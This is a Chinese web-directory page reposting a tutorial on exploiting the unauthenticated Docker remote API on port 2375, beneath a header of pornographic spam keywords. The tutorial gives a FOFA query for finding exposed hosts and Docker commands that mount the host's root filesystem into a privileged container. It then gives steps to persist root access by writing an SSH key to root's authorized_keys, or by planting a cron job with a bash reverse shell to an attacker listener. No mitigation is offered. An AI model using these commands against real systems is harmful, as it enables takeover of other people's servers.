日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

目錄
  • docker api未授權訪問漏洞
    • 00×1 漏洞成因
    • 00×2 信息收集
    • 00×3 漏洞利用
      • ssh連接
      • 寫計劃任務

因為docker賦有遠程的遠程控制,docker開放了一個tcp端口2375,如果沒有限制訪問的話,攻擊者就會通過這個端口來通過docker未授權來獲取服務器權限。

docker api未授權訪問漏洞

00×1 漏洞成因

因為docker賦有遠程的遠程控制,docker開放了一個tcp端口2375,如果沒有限制訪問的話,攻擊者就會通過這個端口來通過docker未授權來獲取服務器權限。

00×2 信息收集

FOFA中搜索port = 2375 && status_code = "404"

訪問站點2375端口,顯示

Docker API 未授權訪問漏洞問題解析

訪問/info目錄,查看版本信息

Docker API 未授權訪問漏洞問題解析

證明改站點存在docker未授權訪問漏洞

00×3 漏洞利用

docker -H tcp://ip ps -a 查看容器
dokcer -H tcp:// images 查看鏡像

為了獲取宿主機的權限,我們需要把宿主機的根目錄掛載到docker容器中

docker -H tcp://ip run -it  --privileged=true -v /:/mnt --entrypoint /bin/bash image-id

–privileged=true:使用該參數,container內的root擁有真正的root權限。

-v /:/mnt:將宿主機的根目錄掛載到/mnt目錄下

–entrypoint /bin/bash:指定鏡像的默認入口命令,該入口命令會在啟動容器時作為根命令執行,所有其他傳入值作為該命令的參數,用法ENTRYPOINT command param1 param2

Docker API 未授權訪問漏洞問題解析

現在就拿到了root權限,利用方式有很多種

ssh連接

 ssh-keygen -t rsa        //生成一個ssh公鑰
 cat /root/.ssh/id_rsa.pub       //查看生成的公鑰
 echo "公鑰內容" > /mnt/root/.ssh/authorized_keys   //寫公鑰
 ssh root@目標ip -i id_rsa    //ssh進行連接

寫計劃任務

nc -lvvp port 		//開啟監聽
echo "* * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1" >  /mnt/var/spool/cron/root   	///反彈shell

分享到:
標簽:授權 服務器 漏洞 解析 訪問
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定